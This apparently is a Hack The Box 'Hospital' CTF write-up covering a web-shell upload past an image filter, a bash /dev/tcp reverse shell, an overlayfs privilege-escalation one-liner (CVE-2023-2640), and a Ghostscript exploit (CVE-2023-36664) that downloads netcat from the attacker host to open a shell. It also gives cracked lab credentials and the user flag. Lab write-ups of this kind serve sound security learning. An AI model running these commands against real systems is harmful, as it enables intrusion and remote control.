Hospital

Reconnaissance

Port Scanning

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30


[atao@Arch ~/Hospital]$ rustscan -a 10.10.11.241
...
Open 10.10.11.241:53
Open 10.10.11.241:22
Open 10.10.11.241:88
Open 10.10.11.241:139
Open 10.10.11.241:135
Open 10.10.11.241:389
Open 10.10.11.241:445
Open 10.10.11.241:464
Open 10.10.11.241:443
Open 10.10.11.241:593
Open 10.10.11.241:636
Open 10.10.11.241:1801
Open 10.10.11.241:2103
Open 10.10.11.241:2105
Open 10.10.11.241:2107
Open 10.10.11.241:2179
Open 10.10.11.241:3389
Open 10.10.11.241:5985
Open 10.10.11.241:6406
Open 10.10.11.241:6409
Open 10.10.11.241:6404
Open 10.10.11.241:6407
Open 10.10.11.241:6616
Open 10.10.11.241:6635
Open 10.10.11.241:6644
Open 10.10.11.241:8080
Open 10.10.11.241:9389
...

We see many open ports and some are really intresting :

139 / 445 : SMB
88 : KDC
135 : LDAP
443 : HTTP
8080 : HTTP

So we know the machine is an Active Directory Domain Controller because of the open port number 88, we can also see an HTTP service running, maybe for the foothold ?

User

Fist user

We start on the 443, but dont find anything special, so lets go on the 8080

We have and upload functionnality, so lets upload some shit.

The site only accept images, so we gonna have to bypass this. Set the Content-Type HTTP Header to image/png does the trick I’m gonna use p0wny-shell

Its uploaded to /uploads/file_name

Got my reverse-shell like this
/usr/bin/bash -c "bash -i >& /dev/tcp/10.10.14.8/12345 0>&1"

Fake root

We spawn as www-data, so we are gonna do some lateral movement. Inside the config.php we find mysql credentials. So lets connect to the database et hope find intresting shit.

Now we have to find the algorithm of theses hashes, we find it in register.php, it’s bcrypt because :

1

password_hash($password, PASSWORD_DEFAULT); # -> It's bcrypt

After cracking theses hashes, I log in on the previous webserver, but nothing has changed. So i get back the my shell and start searching for CVE to privesc and I found CVE-2023-2640 So exploit it :

1
2


www-data@webserver:/var/www/html$ unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
root@webserver:/var/www/html# 

Real user

But still no user.txt, so lets pivot. I grab the hashes in /etc/shadow and try theses passwords others services (maybe the http on the port 443)
So we found : drwilliams:qwe123!@#
We try it on the https://hospital.htb and it worked !

We have a mail in our mail box, it tells us that the files that we send to drbrown will be executed by GHostscript, so we’re gonna find a CVE in Ghostscript : CVE-2023-36664

With this poc: https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection we are able to execute commands.

1
2


[atao@Arch ~/Hospital]$ python3 CVE_2023_36664_exploit.py --generate --filename revshell --payload "curl 10.10.14.8:8000/nc64.exe -o nc.exe" -x eps
[atao@Arch ~/Hospital]$ python3 CVE_2023_36664_exploit.py --generate --filename revshell --payload "nc.exe 10.10.14.8 12345 -e cmd.exe" -x eps

We get out shell and can get the user.txt

1
2


C:\Users\drbrown.HOSPITAL\Documents>type ..\Desktop\user.txt
4b820619299704c2a307ae37b5205771

Root

We have write rights on the C:\xampp\htdocs directory which is the root directory for the webmail. We can try to upload p0wny-shell another time, and BOOM, a root shell

HTB - Hospital

A writeup of the HTB Hospital box